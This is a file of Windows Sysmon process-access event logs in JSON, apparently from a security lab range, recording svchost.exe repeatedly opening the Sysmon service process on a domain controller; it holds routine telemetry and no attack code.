{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1305,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1306,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1307,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1308,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1309,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1310,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1311,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1312,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
